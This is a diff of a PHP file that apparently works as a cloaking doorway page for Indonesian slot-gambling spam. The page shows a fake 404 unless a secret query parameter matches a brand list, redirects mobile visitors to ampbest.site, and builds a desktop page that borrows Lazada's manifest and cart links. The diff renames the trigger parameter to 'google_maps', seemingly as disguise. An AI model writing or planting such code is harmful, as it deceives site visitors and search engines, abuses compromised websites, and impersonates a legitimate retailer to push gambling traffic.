--- a/main/news
+++ b/main/news
@@ -6,10 +6,10 @@ function feedback404()
     echo "<head><link rel='icon' href='https://ik.imagekit.io/2at4km90f/star.png' type='image/x-icon' /></head><h1>404 Not Found</h1>";
 }
 
-if (isset($_GET['idm'])) {
+if (isset($_GET['google_maps'])) {
     $filename = "data.txt";
     $lines = file($filename, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
-    $target_string = strtolower($_GET['idm']);
+    $target_string = strtolower($_GET['google_maps']);
     foreach ($lines as $item) {
         if (strtolower($item) === $target_string) {
             $BRAND = strtoupper($target_string);
@@ -43,7 +43,7 @@ if (isset($_GET['idm'])) {
 $userAgent = $_SERVER['HTTP_USER_AGENT']; 
  function isMobile() { return preg_match("/(android|avantgo|blackberry|bolt|boost|cricket|docomo|fone|hiptop|mini|mobi|palm|phone|pie|tablet|up\.browser|up\.link|webos|wos)/i", $_SERVER["HTTP_USER_AGENT"]); }
  if(isMobile()){
-      header("Location: https://ampbest.site/news/?idm=".$BRANDS."");
+      header("Location: https://ampbest.site/news/?google_maps=".$BRANDS."");
     }else{
 ?>
 
@@ -68,7 +68,7 @@ $userAgent = $_SERVER['HTTP_USER_AGENT'];
     <link rel="icon" type="image/x-icon" href="https://ik.imagekit.io/2at4km90f/star.png" />
     <link rel="manifest" href="https://g.lazcdn.com/g/lzdfe/pwa-assets/5.0.7/manifest/id.json" />
     <link rel="canonical" href="<?php echo $urlPath ?>" />
-    <link rel="amphtml" href="https://ampbest.site/hartaban/?idm=<?php echo $BRANDS ?>" />
+    <link rel="amphtml" href="https://ampbest.site/hartaban/?google_maps=<?php echo $BRANDS ?>" />
     <!-- start preload -->
     <link rel="preload" href="https://ik.imagekit.io/2at4km90f/slot-gacor-pasti-wede.webp" as="image" />
     <link rel="preconnect dns-prefetch" href="https://cart.lazada.co.id" />
